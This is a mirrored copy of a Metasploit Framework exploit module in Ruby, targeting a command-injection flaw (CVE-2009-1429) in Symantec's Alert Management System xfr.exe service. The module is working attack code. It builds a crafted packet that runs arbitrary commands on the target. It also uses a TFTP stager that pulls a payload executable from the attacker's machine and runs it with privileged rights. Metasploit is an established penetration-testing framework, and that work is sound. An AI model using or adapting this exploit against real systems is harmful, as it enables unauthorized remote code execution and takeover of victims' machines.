CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/antivirus/ams_xfr.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::CmdStager

10
  include Msf::Exploit::Remote::Tcp

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(update_info(info,

15
      'Name'           => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',

16
      'Description'    => %q{

17
          Symantec System Center Alert Management System is prone to a remote command-injection vulnerability

18
          because the application fails to properly sanitize user-supplied input.

19
      },

20
      'Author'         => [ 'MC' ],

21
      'License'        => MSF_LICENSE,

22
      'References'     =>

23
        [

24
          [ 'CVE', '2009-1429' ],

25
          [ 'BID', '34671' ],

26
          [ 'OSVDB', '54157' ],

27
          [ 'ZDI', '09-060' ],

28
          [ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]

29
        ],

30
      'Targets'       =>

31
        [

32
          [ 'Windows Universal',

33
            {

34
              'Arch' => ARCH_X86,

35
              'Platform' => 'win'

36
            }

37
          ]

38
        ],

39
      'CmdStagerFlavor' => 'tftp',

40
      'Privileged' => true,

41
      'Platform' => 'win',

42
      'DefaultTarget' => 0,

43
      'DisclosureDate' => '2009-04-28'))

44


45
    register_options(

46
      [

47
        Opt::RPORT(12174),

48
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),

49
      ])

50
  end

51


52
  def windows_stager

53
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

54
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']

55
    execute_cmdstager({ temp: '.', tftphost: tftphost })

56
    @payload_exe = generate_payload_exe

57


58
    print_status("Attempting to execute the payload...")

59
    execute_command(@payload_exe)

60
  end

61


62
  def execute_command(cmd, opts = {})

63


64
    connect

65


66
      len  = 2 + cmd.length

67


68
      data =  [0x00000000].pack('V')

69
      data << len.chr

70
      data << "\x00"

71
      data << cmd + " "

72
      data << "\x00"

73


74
      sock.put(data)

75


76
      res = sock.get_once

77


78
        if (!res)

79
          print_error("Did not received data. Failed?")

80
        else

81
          print_good("Got data, execution successful!")

82
        end

83


84
    disconnect

85


86
  end

87


88
  def exploit

89
    unless datastore['CMD'].blank?

90
      print_status("Executing command '#{datastore['CMD']}'")

91
      execute_command(datastore['CMD'])

92
      return

93
    end

94


95
    case target['Platform']

96
      when 'win'

97
        windows_stager

98
      else

99
        fail_with(Failure::Unknown, 'Target not supported.')

100
    end

101


102
    handler

103


104
  end

105
end

106


107